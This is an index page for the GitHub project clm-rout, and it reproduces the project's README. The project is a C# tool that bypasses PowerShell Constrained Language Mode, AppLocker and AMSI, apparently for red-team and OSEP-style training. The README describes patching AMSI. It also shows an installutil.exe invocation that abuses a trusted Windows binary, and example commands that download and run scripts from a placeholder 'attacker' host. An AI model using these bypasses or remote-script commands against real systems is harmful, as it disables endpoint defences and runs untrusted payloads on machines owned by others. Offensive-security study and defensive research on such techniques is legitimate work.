Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/aress31/clm-rout

A C# program featuring an all-in-one bypass for CLM, AppLocker and AMSI using Runspace.
https://github.com/aress31/clm-rout

amsi amsi-bypass applocker applocker-bypass clm clm-bypass constraint-language installutil living-off-the-land offensive-security osep powershell runspace windows windows-defender

Last synced: about 2 hours ago
JSON representation

A C# program featuring an all-in-one bypass for CLM, AppLocker and AMSI using Runspace.

Host: GitHub
URL: https://github.com/aress31/clm-rout
Owner: aress31
License: bsd-3-clause
Created: 2022-07-31T12:46:03.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-07-31T13:27:40.000Z (over 2 years ago)
Last Synced: 2024-10-31T10:51:31.654Z (7 days ago)
Topics: amsi, amsi-bypass, applocker, applocker-bypass, clm, clm-bypass, constraint-language, installutil, living-off-the-land, offensive-security, osep, powershell, runspace, windows, windows-defender
Language: C#
Homepage:
Size: 7.81 KB
Stars: 17
Watchers: 2
Forks: 6
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        # clm-rout

[![Language](https://img.shields.io/badge/Lang-C%23-blue)](https://docs.microsoft.com/en-gb/powershell/)

[![License](https://img.shields.io/badge/License-BSD%203-red.svg)](https://docs.microsoft.com/en-us/dotnet/csharp/)

## An all-in-one bypass for `PowerShell Constrained Language Mode` (`CLM`), `AppLocker` and `Antimalware Scan Interface` (`AMSI`) using Runspace.

## Features

- Evade `AppLocker`.

- Evade `CLM`.

- Patch `AMSI` via the `/pacth` command switch.

- Execute command(s) via the `/cmd=` command switch.

- Load and execute remotely hosted script(s) via the `/url=` command switch.

- Output the results of commands/scripts (supports `stdout` and `stderr`).

## Installation

1. Clone/download `clm-rout`:

    ```powershell

    git clone https://github.com/aress31/clm-rout

    ```

2. Build the project with `Visual Studio 2022`.

## Usage

- (Recommended) Create an "alias":

```powershell

function run {

	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `

		/uninstall /logfile= /LogToConsole=false `

		/patch $Args `

		C:\users\foo\CLMRout.exe

}

```

### Examples

- Execute command(s):

    ```powershell

    run /cmd="hostname; whoami"

    ```

- Execute remote script(s):

    ```powershell

    run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"

    ```

- Execute remote script(s) followed by command(s):

    ```powershell

    run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"

    ```

## Sponsor 💓

If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as **a lot** of my **personal time** went into creating this project. 😪

It is easy, all you got to do is press the `Sponsor` button at the top of this page or alternatively [click this link](https://github.com/sponsors/aress31). 😁

## Reporting Issues

Found a bug 🐛? I would love to squash it!

Please report all issues on the GitHub [issues tracker](https://github.com/aress31/clm-rout/issues).

## Contributing

You would like to contribute to better this project? 🤩

Please submit all `PRs` on the GitHub [pull requests tracker](https://github.com/aress31/clm-rout/pulls).

## License

`clm-rout` is distributed under the terms of the `BSD 3`.

See [LICENSE](./LICENSE) for details.